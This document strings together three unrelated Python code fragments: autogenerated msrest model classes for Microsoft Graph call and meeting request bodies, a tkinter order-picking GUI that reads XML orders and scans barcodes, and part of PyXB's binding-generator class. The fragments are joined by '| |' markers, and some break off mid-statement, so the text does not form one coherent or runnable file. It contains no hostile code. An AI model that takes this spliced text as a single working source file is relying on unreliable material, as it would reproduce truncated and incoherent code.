self.additional_properties = kwargs.get('additional_properties', None)
self.client_context = kwargs.get('client_context', None)
class Paths14Wb7KqCommunicationsCallsCallIdMicrosoftGraphRecordresponsePostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
"""Paths14Wb7KqCommunicationsCallsCallIdMicrosoftGraphRecordresponsePostRequestbodyContentApplicationJsonSchema.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param prompts:
:type prompts: list[dict[str, object]]
:param barge_in_allowed:
:type barge_in_allowed: bool
:param initial_silence_timeout_in_seconds:
:type initial_silence_timeout_in_seconds: int
:param max_silence_timeout_in_seconds:
:type max_silence_timeout_in_seconds: int
:param max_record_duration_in_seconds:
:type max_record_duration_in_seconds: int
:param play_beep:
:type play_beep: bool
:param stream_while_recording:
:type stream_while_recording: bool
:param stop_tones:
:type stop_tones: list[str]
:param client_context:
:type client_context: str
"""
_validation = {
'initial_silence_timeout_in_seconds': {'maximum': 2147483647, 'minimum': -2147483648},
'max_silence_timeout_in_seconds': {'maximum': 2147483647, 'minimum': -2147483648},
'max_record_duration_in_seconds': {'maximum': 2147483647, 'minimum': -2147483648},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'prompts': {'key': 'prompts', 'type': '[{object}]'},
'barge_in_allowed': {'key': 'bargeInAllowed', 'type': 'bool'},
'initial_silence_timeout_in_seconds': {'key': 'initialSilenceTimeoutInSeconds', 'type': 'int'},
'max_silence_timeout_in_seconds': {'key': 'maxSilenceTimeoutInSeconds', 'type': 'int'},
'max_record_duration_in_seconds': {'key': 'maxRecordDurationInSeconds', 'type': 'int'},
'play_beep': {'key': 'playBeep', 'type': 'bool'},
'stream_while_recording': {'key': 'streamWhileRecording', 'type': 'bool'},
'stop_tones': {'key': 'stopTones', 'type': '[str]'},
'client_context': {'key': 'clientContext', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Paths14Wb7KqCommunicationsCallsCallIdMicrosoftGraphRecordresponsePostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.prompts = kwargs.get('prompts', None)
self.barge_in_allowed = kwargs.get('barge_in_allowed', False)
self.initial_silence_timeout_in_seconds = kwargs.get('initial_silence_timeout_in_seconds', None)
self.max_silence_timeout_in_seconds = kwargs.get('max_silence_timeout_in_seconds', None)
self.max_record_duration_in_seconds = kwargs.get('max_record_duration_in_seconds', None)
self.play_beep = kwargs.get('play_beep', False)
self.stream_while_recording = kwargs.get('stream_while_recording', False)
self.stop_tones = kwargs.get('stop_tones', None)
self.client_context = kwargs.get('client_context', None)
class Paths183Gi8UCommunicationsCallsCallIdMicrosoftGraphRedirectPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
"""Paths183Gi8UCommunicationsCallsCallIdMicrosoftGraphRedirectPostRequestbodyContentApplicationJsonSchema.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param targets:
:type targets: list[~cloud_communications.models.MicrosoftGraphInvitationParticipantInfo]
:param target_disposition: Possible values include: "default", "simultaneousRing", "forward".
:type target_disposition: str or ~cloud_communications.models.MicrosoftGraphCallDisposition
:param timeout:
:type timeout: int
:param mask_callee:
:type mask_callee: bool
:param mask_caller:
:type mask_caller: bool
:param callback_uri:
:type callback_uri: str
"""
_validation = {
'timeout': {'maximum': 2147483647, 'minimum': -2147483648},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'targets': {'key': 'targets', 'type': '[MicrosoftGraphInvitationParticipantInfo]'},
'target_disposition': {'key': 'targetDisposition', 'type': 'str'},
'timeout': {'key': 'timeout', 'type': 'int'},
'mask_callee': {'key': 'maskCallee', 'type': 'bool'},
'mask_caller': {'key': 'maskCaller', 'type': 'bool'},
'callback_uri': {'key': 'callbackUri', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Paths183Gi8UCommunicationsCallsCallIdMicrosoftGraphRedirectPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.targets = kwargs.get('targets', None)
self.target_disposition = kwargs.get('target_disposition', None)
self.timeout = kwargs.get('timeout', None)
self.mask_callee = kwargs.get('mask_callee', False)
self.mask_caller = kwargs.get('mask_caller', False)
self.callback_uri = kwargs.get('callback_uri', None)
class Paths1Bh76WaCommunicationsCallsCallIdParticipantsMicrosoftGraphInvitePostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
"""Paths1Bh76WaCommunicationsCallsCallIdParticipantsMicrosoftGraphInvitePostRequestbodyContentApplicationJsonSchema.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param participants:
:type participants: list[~cloud_communications.models.MicrosoftGraphInvitationParticipantInfo]
:param client_context:
:type client_context: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'participants': {'key': 'participants', 'type': '[MicrosoftGraphInvitationParticipantInfo]'},
'client_context': {'key': 'clientContext', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Paths1Bh76WaCommunicationsCallsCallIdParticipantsMicrosoftGraphInvitePostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.participants = kwargs.get('participants', None)
self.client_context = kwargs.get('client_context', None)
class Paths1Gzqcv2CommunicationsCallsCallIdMicrosoftGraphPlaypromptPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
"""Paths1Gzqcv2CommunicationsCallsCallIdMicrosoftGraphPlaypromptPostRequestbodyContentApplicationJsonSchema.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param prompts:
:type prompts: list[dict[str, object]]
:param loop:
:type loop: bool
:param client_context:
:type client_context: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'prompts': {'key': 'prompts', 'type': '[{object}]'},
'loop': {'key': 'loop', 'type': 'bool'},
'client_context': {'key': 'clientContext', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Paths1Gzqcv2CommunicationsCallsCallIdMicrosoftGraphPlaypromptPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.prompts = kwargs.get('prompts', None)
self.loop = kwargs.get('loop', False)
self.client_context = kwargs.get('client_context', None)
class Paths1JbdsmaCommunicationsCallsMicrosoftGraphLogteleconferencedevicequalityPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
"""Paths1JbdsmaCommunicationsCallsMicrosoftGraphLogteleconferencedevicequalityPostRequestbodyContentApplicationJsonSchema.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param quality: teleconferenceDeviceQuality.
:type quality: ~cloud_communications.models.MicrosoftGraphTeleconferenceDeviceQuality
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'quality': {'key': 'quality', 'type': 'MicrosoftGraphTeleconferenceDeviceQuality'},
}
def __init__(
self,
**kwargs
):
super(Paths1JbdsmaCommunicationsCallsMicrosoftGraphLogteleconferencedevicequalityPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.quality = kwargs.get('quality', None)
class Paths1Mdqe66CommunicationsCallsCallIdMicrosoftGraphRecordPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
"""Paths1Mdqe66CommunicationsCallsCallIdMicrosoftGraphRecordPostRequestbodyContentApplicationJsonSchema.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param prompts:
:type prompts: list[dict[str, object]]
:param barge_in_allowed:
:type barge_in_allowed: bool
:param initial_silence_timeout_in_seconds:
:type initial_silence_timeout_in_seconds: int
:param max_silence_timeout_in_seconds:
:type max_silence_timeout_in_seconds: int
:param max_record_duration_in_seconds:
:type max_record_duration_in_seconds: int
:param play_beep:
:type play_beep: bool
:param stream_while_recording:
:type stream_while_recording: bool
:param stop_tones:
:type stop_tones: list[str]
:param client_context:
:type client_context: str
"""
_validation = {
'initial_silence_timeout_in_seconds': {'maximum': 2147483647, 'minimum': -2147483648},
'max_silence_timeout_in_seconds': {'maximum': 2147483647, 'minimum': -2147483648},
'max_record_duration_in_seconds': {'maximum': 2147483647, 'minimum': -2147483648},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'prompts': {'key': 'prompts', 'type': '[{object}]'},
'barge_in_allowed': {'key': 'bargeInAllowed', 'type': 'bool'},
'initial_silence_timeout_in_seconds': {'key': 'initialSilenceTimeoutInSeconds', 'type': 'int'},
'max_silence_timeout_in_seconds': {'key': 'maxSilenceTimeoutInSeconds', 'type': 'int'},
'max_record_duration_in_seconds': {'key': 'maxRecordDurationInSeconds', 'type': 'int'},
'play_beep': {'key': 'playBeep', 'type': 'bool'},
'stream_while_recording': {'key': 'streamWhileRecording', 'type': 'bool'},
'stop_tones': {'key': 'stopTones', 'type': '[str]'},
'client_context': {'key': 'clientContext', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Paths1Mdqe66CommunicationsCallsCallIdMicrosoftGraphRecordPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.prompts = kwargs.get('prompts', None)
self.barge_in_allowed = kwargs.get('barge_in_allowed', False)
self.initial_silence_timeout_in_seconds = kwargs.get('initial_silence_timeout_in_seconds', None)
self.max_silence_timeout_in_seconds = kwargs.get('max_silence_timeout_in_seconds', None)
self.max_record_duration_in_seconds = kwargs.get('max_record_duration_in_seconds', None)
self.play_beep = kwargs.get('play_beep', False)
self.stream_while_recording = kwargs.get('stream_while_recording', False)
self.stop_tones = kwargs.get('stop_tones', None)
self.client_context = kwargs.get('client_context', None)
class Paths1Pc6SxrCommunicationsOnlinemeetingsMicrosoftGraphCreateorgetPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
"""Paths1Pc6SxrCommunicationsOnlinemeetingsMicrosoftGraphCreateorgetPostRequestbodyContentApplicationJsonSchema.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param chat_info: chatInfo.
:type chat_info: ~cloud_communications.models.MicrosoftGraphChatInfo
:param end_date_time:
:type end_date_time: ~datetime.datetime
:param external_id:
:type external_id: str
:param participants: meetingParticipants.
:type participants: ~cloud_communications.models.MicrosoftGraphMeetingParticipants
:param start_date_time:
:type start_date_time: ~datetime.datetime
:param subject:
:type subject: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'chat_info': {'key': 'chatInfo', 'type': 'MicrosoftGraphChatInfo'},
'end_date_time': {'key': 'endDateTime', 'type': 'iso-8601'},
'external_id': {'key': 'externalId', 'type': 'str'},
'participants': {'key': 'participants', 'type': 'MicrosoftGraphMeetingParticipants'},
'start_date_time': {'key': 'startDateTime', 'type': 'iso-8601'},
'subject': {'key': 'subject', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Paths1Pc6SxrCommunicationsOnlinemeetingsMicrosoftGraphCreateorgetPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.chat_info = kwargs.get('chat_info', None)
self.end_date_time = kwargs.get('end_date_time', None)
self.external_id = kwargs.get('external_id', None)
self.participants = kwargs.get('participants', None)
self.start_date_time = kwargs.get('start_date_time', None)
self.subject = kwargs.get('subject', None)
class Paths1X7BvttCommunicationsCallsCallIdMicrosoftGraphUnmutePostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
"""Paths1X7BvttCommunicationsCallsCallIdMicrosoftGraphUnmutePostRequestbodyContentApplicationJsonSchema.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param client_context:
:type client_context: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'client_context': {'key': 'clientContext', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Paths1X7BvttCommunicationsCallsCallIdMicrosoftGraphUnmutePostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.client_context = kwargs.get('client_context', None)
class Paths4QrghdCommunicationsCallsCallIdMicrosoftGraphRejectPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
"""Paths4QrghdCommunicationsCallsCallIdMicrosoftGraphRejectPostRequestbodyContentApplicationJsonSchema.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param reason: Possible values include: "none", "busy", "forbidden", "unknownFutureValue".
:type reason: str or ~cloud_communications.models.MicrosoftGraphRejectReason
:param callback_uri:
:type callback_uri: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'reason': {'key': 'reason', 'type': 'str'},
'callback_uri': {'key': 'callbackUri', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Paths4QrghdCommunicationsCallsCallIdMicrosoftGraphRejectPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.reason = kwargs.get('reason', None)
self.callback_uri = kwargs.get('callback_uri', None)
class Paths4Zbm7LCommunicationsCallsCallIdMicrosoftGraphTransferPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
"""Paths4Zbm7LCommunicationsCallsCallIdMicrosoftGraphTransferPostRequestbodyContentApplicationJsonSchema.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param transfer_target: invitationParticipantInfo.
:type transfer_target: ~cloud_communications.models.MicrosoftGraphInvitationParticipantInfo
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'transfer_target': {'key': 'transferTarget', 'type': 'MicrosoftGraphInvitationParticipantInfo'},
}
def __init__(
self,
**kwargs
):
super(Paths4Zbm7LCommunicationsCallsCallIdMicrosoftGraphTransferPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.transfer_target = kwargs.get('transfer_target', None)
class PathsEipedyCommunicationsCallsCallIdMicrosoftGraphUpdaterecordingstatusPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
"""PathsEipedyCommunicationsCallsCallIdMicrosoftGraphUpdaterecordingstatusPostRequestbodyContentApplicationJsonSchema.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param status: Possible values include: "unknown", "notRecording", "recording", "failed",
"unknownFutureValue".
:type status: str or ~cloud_communications.models.MicrosoftGraphRecordingStatus
:param client_context:
:type client_context: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'status': {'key': 'status', 'type': 'str'},
'client_context': {'key': 'clientContext', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PathsEipedyCommunicationsCallsCallIdMicrosoftGraphUpdaterecordingstatusPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.status = kwargs.get('status', None)
self.client_context = kwargs.get('client_context', None)
class PathsKpvac3CommunicationsCallsCallIdParticipantsMicrosoftGraphMuteallPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
"""PathsKpvac3CommunicationsCallsCallIdParticipantsMicrosoftGraphMuteallPostRequestbodyContentApplicationJsonSchema.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param participants:
:type participants: list[str]
:param client_context:
:type client_context: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'participants': {'key': 'participants', 'type': '[str]'},
'client_context': {'key': 'clientContext', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PathsKpvac3CommunicationsCallsCallIdParticipantsMicrosoftGraphMuteallPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.participants = kwargs.get('participants', None)
self.client_context = kwargs.get('client_context', | |
# tkinter GUI library
import tkinter as tk
# date time library used for clock and time durations
from datetime import datetime, timedelta
# xml parser
from xml.dom import minidom
from xml.etree import ElementTree
# Python Imaging Library
from PIL import ImageTk, Image
# communication library used for all network activity
from lib import NetworkComms
# common ui elements
from lib import UICommon
# Config global variables
from lib import Config
# object classes
from lib import Objects
class Orders():
comms = NetworkComms.Communication()
uicommon = UICommon.UICommon()
click_start_time = datetime.now() # used for detecting a click or scroll
cursor_start_position = 0
order_array = [] # stores the list of orders
items_array = [] # stores the items within a single order
current_order = Objects.objOrder()
current_item = Objects.objOrderItem()
root_frame = None
parent_frame = None # the scroll frame
itemlist_frame = None # used within the order details frame to list items
true_image = None # used for the item pick status
false_image = None # used for the item pick status
def __init__(self, root, master):
#
# Initialise the orders class
#
self.root_frame = root
self.parent_frame = master
self.uicommon.root_frame = self.root_frame
self.true_image = ImageTk.PhotoImage(Image.open(self.uicommon.system_path + "true.bmp"))
self.false_image = ImageTk.PhotoImage(Image.open(self.uicommon.system_path + "false.bmp"))
def process_barcode(self, barcode, frame=None):
#
# trim the first two numbers and the last number from the order barcode and convert it into an integer
#
if (frame != None):
self.parent_frame = frame
code = barcode[2:]
order_id = int(code[:-1])
# get the order details
self.__order_details(order_id)
return
def process_product_barcode(self, barcode, frame=None):
#
# search the items array for the product barcode
#
if (frame != None):
self.parent_frame = frame
found = False
for i in self.items_array:
if (i.barcode == barcode):
self.current_item = i
self.__item_quantity_changed(i.picked + 1)
found = True
break
if (found == False):
self.uicommon.message_box(self.root_frame, "Not Found", "The barcode does not\n match any of the\n ordered items.")
return
def orders_list(self, frame):
#
# Fetches and displays a list of the current orders
#
self.parent_frame = frame
# set the scanning mode to default
Config.scanning_mode = 0
# clear the contents of the parent frame
self.uicommon.clear_frame(self.parent_frame)
# get the xml order list from the server and check that xml data was received
order_data = self.comms.get_order_list()
if (order_data != None):
# parse the xml string and get a list of the orders
xml_doc = ElementTree.fromstring(order_data)
xml_orders_list = xml_doc.findall("order")
print(str(len(xml_orders_list)) + " orders")
self.order_array.clear()
# loop through the orders
for s in xml_orders_list:
obj = Objects.objOrder()
obj.id = int(s.find("id").text)
obj.date = datetime.strptime(s.find("date").text, '%Y-%m-%dT%H:%M:%S')
obj.country = s.find("country").text
obj.name = s.find("name").text
obj.status = s.find("status").text
obj.total = float(s.find("total").text)
self.order_array.append(obj)
# build the table
index = 0
for i in self.order_array: #Rows
# set the colour for the first cell to show the status of the order
colour = "#ffffff"
if (str(i.status) == "Quotation"):
colour = "#b4c6e7"
elif (str(i.status) == "Payment Error"):
colour = "#8497b0"
elif (str(i.status) == "Order Saved"):
colour = "#fff600"
elif (str(i.status) == "Payment Pending"):
colour = "#00b0f0"
elif (str(i.status) == "Card Payment Pending"):
colour = "#00b0f0"
elif (str(i.status) == "Account Pending"):
colour = "#00b0f0"
elif (str(i.status) == "Cheque Pending"):
colour = "#00b0f0"
elif (str(i.status) == "Payment Received"):
colour = "#00cc00"
elif (str(i.status) == "Below Min Qty"):
colour = "#9bc2e6"
elif (str(i.status) == "Age Verification"):
colour = "#ff0000"
elif (str(i.status) == "Awaiting Stock"):
colour = "#bf8f00"
elif (str(i.status) == "Being Processed"):
colour = "#ffc000"
elif (str(i.status) == "Awaiting Dispatch"):
colour = "#57006d"
ordercolourcell = tk.Label(frame, text=" ", background=colour, padx=5, pady=10)
ordercolourcell.grid(row=index, column=0, sticky=tk.N+tk.S+tk.E+tk.W)
orderidcell = self.uicommon.table_cell(frame, str(i.id), justify=tk.CENTER, row=index, column=1)
self.uicommon.bind_children(orderidcell, '<ButtonPress-1>', self.__row_pressed)
self.uicommon.bind_children(orderidcell, '<ButtonRelease-1>', lambda event, arg1=i.id: self.__orders_list_click(event, arg1))
t = datetime.strftime(i.date, "%d/%m/%y")
orderdatecell = self.uicommon.table_cell(frame, t, row=index, column=2)
self.uicommon.bind_children(orderdatecell, '<ButtonPress-1>', self.__row_pressed)
self.uicommon.bind_children(orderdatecell, '<ButtonRelease-1>', lambda event, arg1=i.id: self.__orders_list_click(arg1))
ordertextcell = self.uicommon.table_cell(frame, str(i.name) + "\n" + str(i.country), row=index, column=3)
self.uicommon.bind_children(ordertextcell, '<ButtonPress-1>', self.__row_pressed)
self.uicommon.bind_children(ordertextcell, '<ButtonRelease-1>', lambda event, arg1=i.id: self.__orders_list_click(arg1))
ordertotalcell = self.uicommon.table_cell(frame, str(i.total), justify=tk.RIGHT, row=index, column=4)
self.uicommon.bind_children(ordertotalcell, '<ButtonPress-1>', self.__row_pressed)
self.uicommon.bind_children(ordertotalcell, '<ButtonRelease-1>', lambda event, arg1=i.id: self.__orders_list_click(arg1))
index+=1
# configure the column weights
self.uicommon.table_column_weighs(frame, [5, 4, 2, 1, 3], [5,60,80,120,60])
else:
# Data could not be retrieved from the server so show an error message
self.uicommon.message_box(self.root_frame, "Communication Error", "The order list could not be retrieved from the server")
return
def __orders_list_click(self, selected_id):
#
# check if the mouse has been moved more than 5 pixels
#
x = self.root_frame.winfo_pointery() - self.cursor_start_position
if (x > -5) and (x < 5): # mouse has moved less than 5 pixels so detect it as a click
# check the amount of time that has passed since the press started
duration = datetime.now() - self.click_start_time
if (duration < timedelta(seconds=1)): # less than 1 second has passed so detect as click instead of hold
self.__order_details(selected_id)
return
def __order_details(self, order_id):
#
# set the scanning mode to be 1: Orders
#
Config.scanning_mode = 1 # orders mode
# get the xml order list from the server
order_data = self.comms.get_order_details(order_id)
# parse the xml string and get a list of the orders
xml_doc = ElementTree.fromstring(order_data)
xml_order_overview = xml_doc.findall("order")
xml_item_list = xml_doc.findall("item")
print(str(len(xml_item_list)) + " items")
self.items_array.clear()
# get the order overview information
for s in xml_order_overview:
self.current_order.id = int(s.find("id").text)
self.current_order.date = datetime.strptime(s.find("date").text, '%Y-%m-%dT%H:%M:%S')
self.current_order.country = s.find("country").text
self.current_order.name = s.find("name").text
self.current_order.status = s.find("status").text
self.current_order.total = float(s.find("total").text)
print("Current Order: " + str(self.current_order.id))
# loop through the order items
for s in xml_item_list:
obj = Objects.objOrderItem()
obj.orderid = self.current_order.id
obj.productref = s.find("productref").text
obj.productname = s.find("productname").text
obj.quantity = int(s.find("quantity").text)
obj.unitprice = float(s.find("unitprice").text)
obj.barcode = s.find("barcode").text
print(obj.productname)
self.items_array.append(obj)
# clear any existing elements from the parent frame
self.uicommon.clear_frame(self.parent_frame)
# build the overview frame
overview_frame = tk.Frame(self.parent_frame, width=320)
overview_frame.pack()
id_title_label = self.uicommon.table_title(overview_frame, "Order ID:", row=0, column=0)
id_label = self.uicommon.table_cell(overview_frame, str(self.current_order.id), row=0, column=1)
date_title_label = self.uicommon.table_title(overview_frame, "Date:", row=1, column=0)
date_label = self.uicommon.table_cell(overview_frame, str(self.current_order.date), row=1, column=1, columnspan=2)
name_title_label = self.uicommon.table_title(overview_frame, "Name:", row=2, column=0)
name_label = self.uicommon.table_cell(overview_frame, str(self.current_order.name), row=2, column=1, columnspan=2)
country_title_label = self.uicommon.table_title(overview_frame, "Country:", row=3, column=0)
country_label = self.uicommon.table_cell(overview_frame, str(self.current_order.country), row=3, column=1, columnspan=2)
status_title_label = self.uicommon.table_title(overview_frame, "Status:", row=4, column=0)
status_label = self.uicommon.table_cell(overview_frame, str(self.current_order.status), row=4, column=1, columnspan=2)
# save button
save_button = tk.Button(overview_frame, width=120, font="DejaVuSans 30 normal", foreground="white",pady=5, activeforeground="white", background="#588706",activebackground="#4b7206", text="Save", command=self.__save_order)
save_button.grid(row=0, column=2)
# set the column weights and widths
self.uicommon.table_column_weighs(overview_frame, [3, 1, 2], [80, 120, 120])
self.itemlist_frame = tk.Frame(self.parent_frame, width=320)
self.itemlist_frame.pack()
# build the table frame
self.__item_list_table()
return
def __item_list_table(self):
#
# clear the contents of the item list table
#
self.uicommon.clear_frame(self.itemlist_frame)
index = 1
# add the titles
product_title = self.uicommon.table_title(self.itemlist_frame, "Product ID/Name", row=0, column=0)
quantity_title = self.uicommon.table_title(self.itemlist_frame, "Qty", row=0, column=1)
picked_title = self.uicommon.table_title(self.itemlist_frame, "Picked", row=0, column=2)
# add the contents of the items_array to the table
for i in self.items_array:
product_cell = self.uicommon.table_cell(self.itemlist_frame, i.productref + "\n" + i.productname, row=index, column=0)
quanitity_cell = self.uicommon.table_cell(self.itemlist_frame, i.quantity, row=index, column=1)
if (i.picked == 0):
picked_cell = self.uicommon.table_cell(self.itemlist_frame, image=self.false_image, row=index, column=2)
elif(i.picked == i.quantity):
picked_cell = self.uicommon.table_cell(self.itemlist_frame, image=self.true_image, row=index, column=2)
else:
picked_cell = self.uicommon.table_cell(self.itemlist_frame, image=None, celltext=str(i.picked), row=index, column=2)
self.uicommon.bind_children(picked_cell, '<ButtonPress-1>', self.__row_pressed)
self.uicommon.bind_children(picked_cell, '<ButtonRelease-1>', lambda event, arg1=i: self.__item_click(arg1))
index+= 1
self.uicommon.table_column_weighs(self.itemlist_frame, [1, 2], [210, 40, 40])
def __item_click(self, selected_item):
#
# Checks if a click is valid and then updates the picked quanitity
#
# check if the mouse has been moved more than 5 pixels
x = self.root_frame.winfo_pointery() - self.cursor_start_position
if (x > -5) and (x < 5): # mouse has moved less than 5 pixels so detect it as a click
# check the amount of time that has passed since the press started
duration = datetime.now() - self.click_start_time
if (duration < timedelta(seconds=1)): # less than 1 second has passed so detect as click instead of hold
self.current_item = selected_item
# if selected item has already been picked reset it to be unpicked
if (selected_item.picked == selected_item.quantity):
selected_item.picked = 0
self.__items_array_update(selected_item)
self.__item_list_table()
elif(selected_item.quantity == 1):
# get the quantity for the selected item. If the quanitity is 1 update | |
declarations are reserved within the binding
%{namespace_decls}
''', **template_map))
def _moduleUID_vx (self):
nss = []
for nsm in self.namespaceModules():
ns = nsm.namespace()
if ns.isAbsentNamespace():
nss.append('Absent')
else:
nss.append(six.text_type(ns))
nss.sort()
return six.u(';').join(nss)
def __str__ (self):
return 'NGM:%s' % (self.modulePath(),)
def GeneratePython (schema_location=None,
schema_text=None,
namespace=None,
module_prefix_elts=[],
**kw):
generator = Generator(allow_absent_module=True, generate_to_files=False, **kw)
if schema_location is not None:
generator.addSchemaLocation(schema_location)
elif schema_text is not None:
generator.addSchema(schema_text)
modules = generator.bindingModules()
assert 1 == len(modules), '%s produced %d modules: %s' % (namespace, len(modules), six.u(' ').join([ six.text_type(_m) for _m in modules]))
return modules.pop().moduleContents()
import optparse
import re
class Generator (object):
"""Configuration and data for a single binding-generation action."""
_DEFAULT_bindingRoot = '.'
def bindingRoot (self):
"""The directory path into which generated bindings will be written.
@rtype: C{str}"""
return self.__bindingRoot
def setBindingRoot (self, binding_root):
self.__bindingRoot = binding_root
return self
__bindingRoot = None
def __moduleFilePath (self, module_elts, inhibit_extension=False):
if isinstance(module_elts, six.string_types):
module_elts = module_elts.split('.')
else:
module_elts = module_elts[:]
assert 0 < len(module_elts)
if not inhibit_extension:
assert not module_elts[-1].endswith('.py')
module_elts[-1] = '%s.py' % (module_elts[-1],)
return os.path.join(self.bindingRoot(), *module_elts)
def generateToFiles (self):
return self.__generateToFiles
__generateToFiles = None
def modulePathData (self, module):
# file system path to where the bindings are written
# module path from which the bindings are normally imported
# file object into which bindings are written
module_path = None
if isinstance(module, NamespaceModule):
mr = module.moduleRecord()
if mr is None:
return ('/dev/null', None, None)
if self.generationUID() != mr.generationUID():
return ('/dev/null', None, None)
if not self.generateToFiles():
return ('/dev/null', None, None)
if mr.namespace().isBuiltinNamespace() and (not self.allowBuiltinGeneration()):
return ('/dev/null', None, None)
module_path = mr.modulePath()
assert module_path is not None, 'No path specified for module %s' % (mr,)
#if pyxb.namespace.XMLSchema != ns:
# return ('/dev/null', None, None)
#module_path="bogus.xsd"
module_elts = module_path.split('.')
if self.writeForCustomization():
import_file_path = self.__moduleFilePath(module_elts)
module_elts.insert(-1, 'raw')
if not os.path.exists(import_file_path):
raw_module_path = '.'.join(module_elts)
fd = pyxb.utils.utility.OpenOrCreate(import_file_path)
impt = '''# -*- coding: utf-8 -*-
from %s import *
''' % (raw_module_path,)
impd = impt.encode('utf-8')
fd.write(impd)
fd.close()
binding_file_path = self.__moduleFilePath(module_elts)
try:
binding_file = pyxb.utils.utility.OpenOrCreate(binding_file_path, tag=module.moduleUID())
except OSError as e:
if errno.EEXIST == e.errno:
raise pyxb.BindingGenerationError('Target file %s for module %s bindings exists with other content' % (binding_file_path, mr))
raise
elif isinstance(module, NamespaceGroupModule):
if not self.generateToFiles():
raise pyxb.BindingGenerationError('Generation of namespace groups requires generate-to-files')
module_elts = []
if self.modulePrefix():
module_elts.extend(self.modulePrefix().split('.'))
if self.writeForCustomization():
module_elts.append('raw')
in_use = set()
while True:
module_elts.append(pyxb.utils.utility.PrepareIdentifier('nsgroup', in_use, protected=True))
try:
binding_file_path = self.__moduleFilePath(module_elts)
_log.info('Attempting group %s uid %s at %s', module, module.moduleUID(), binding_file_path)
binding_file = pyxb.utils.utility.OpenOrCreate(binding_file_path, tag=module.moduleUID())
break
except OSError as e:
if errno.EEXIST != e.errno:
raise
module_elts.pop()
module_path = '.'.join(module_elts)
else:
assert False
if self.generateToFiles():
for n in range(len(module_elts)-1):
sub_path = self.__moduleFilePath(module_elts[:1+n], inhibit_extension=True)
init_path = os.path.join(sub_path, '__init__.py')
if not os.path.exists(init_path):
open(init_path, 'w')
return (binding_file_path, binding_file, module_path)
def schemaRoot (self):
"""The directory from which entrypoint schemas specified as
relative file paths will be read."""
return self.__schemaRoot
def setSchemaRoot (self, schema_root):
if not schema_root.endswith(os.sep):
schema_root = schema_root + os.sep
